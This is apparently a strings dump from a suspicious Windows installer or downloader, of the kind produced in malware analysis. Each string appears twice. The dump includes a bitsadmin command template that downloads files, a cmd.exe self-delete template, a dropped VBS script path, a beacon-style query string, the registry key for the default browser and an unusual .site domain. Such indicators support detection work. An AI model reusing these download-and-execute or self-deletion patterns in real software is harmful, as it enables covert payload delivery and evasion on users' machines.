{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
OLEAUT32.DLL
kernel32.dll
kernel32.dll
sn=%s&hx=%S&base=%s
sn=%s&hx=%S&base=%s
rfsw%d
rfsw%d
advapi32.dll
advapi32.dll
v2.0.50727
v2.0.50727
v1.1.4322
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
ami%sExd
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
ami%sExi
/c del "%s"
/c del "%s"
cmd.exe
cmd.exe
%TEMP%\task.vbs
%TEMP%\task.vbs
ami%sExdel
ami%sExdel
%%X
%%X
version.dll
version.dll
OleAut32.dll
OleAut32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
1.1.5.26
setup.exe
setup.exe
selfdislikedfarfet.site
selfdislikedfarfet.site